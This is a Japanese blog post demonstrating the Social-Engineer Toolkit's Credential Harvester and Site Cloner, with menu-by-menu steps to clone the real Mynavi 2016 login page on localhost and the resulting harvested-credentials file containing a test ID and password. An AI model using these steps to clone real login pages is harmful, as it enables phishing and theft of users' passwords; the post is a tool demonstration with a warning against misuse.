読者です 読者をやめる 読者になる 読者になる

Social Engineering Toolkitを使って瞬殺で偽サイトを作ってみる

例によって悪用厳禁

Social Engineering Toolkitとは

Social-Engineer Toolkit - TrustedSec - Information Security

通称SET ペネトレーションテスト用のツールなのか?多機能すぎてまだ網羅できてないけど、機能の一つ、偽サイト作成を試してみる

せっかくなのでマイナビ2016のログイン画面の偽サイトを作ってみる^^

インストール

通常だとgit clone https://github.com/trustedsec/social-engineer-toolkit/ set/ってやるんだろうけど色々ライブラリ足さなきゃいけないらしく、面倒なので一式入ったKali Linuxを利用した

Debianベースのディストリビューションとのことなので適当にインスコ

起動

インストール後、適当なユーザーを作っておく。そのユーザーで以下

sudo setoolkit

すると怪しいツールが起動するので以下

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 2
   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method

  99) Return to Main Menu

set:webattack>3
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2

だまし取ったパスワード等の送信先 今回はlocalhostなので何も入力しない

set:webattack> IP address for the POST back in Harvester/Tabnabbing:

偽サイトを作成するにあたって本物サイトのURLここではマイナビ2016のログイン画面なのでhttp://job.mynavi.jp/16/pc/toppage/login/indexと入力

set:webattack> Enter the url to clone:http://job.mynavi.jp/16/pc/toppage/login/index

あとは自動でクローンしてApacheまで起動してくれる まさに瞬殺

実際に騙されてみる

完了後はlocalhostにアクセスするとご対面できる

f:id:thr3a:20150211132109p:plain

うーんこの

で実際にログインしたあと

user@kali:~$ cat /var/www/harvester_2015-02-11\ 10\:27\:30.404102.txt 
Array
(
    [corpId] => 
    [fullPath] => 
    [nextUrl] => /toppage/displayTopPage/index?reqcd=1688759746
    [displayControlKbn] => memberLogin
    [headDispMessage] => �}�C�y�[�W�փ��O�C�����܂��B
    [corpName] => 
    [loginTitle] => ���O�C�����
    [isSecure] => 0
    [autoLoginKey] => 
    [bookmarkMode] => 
    [memberId] => 114514
    [password] => p@ssw0rd
    [doLogin] => ���O�C��
)

まぁURLがアレだけどコピー精度は抜群 本物だって(デフォルトだと)httpsじゃないんだし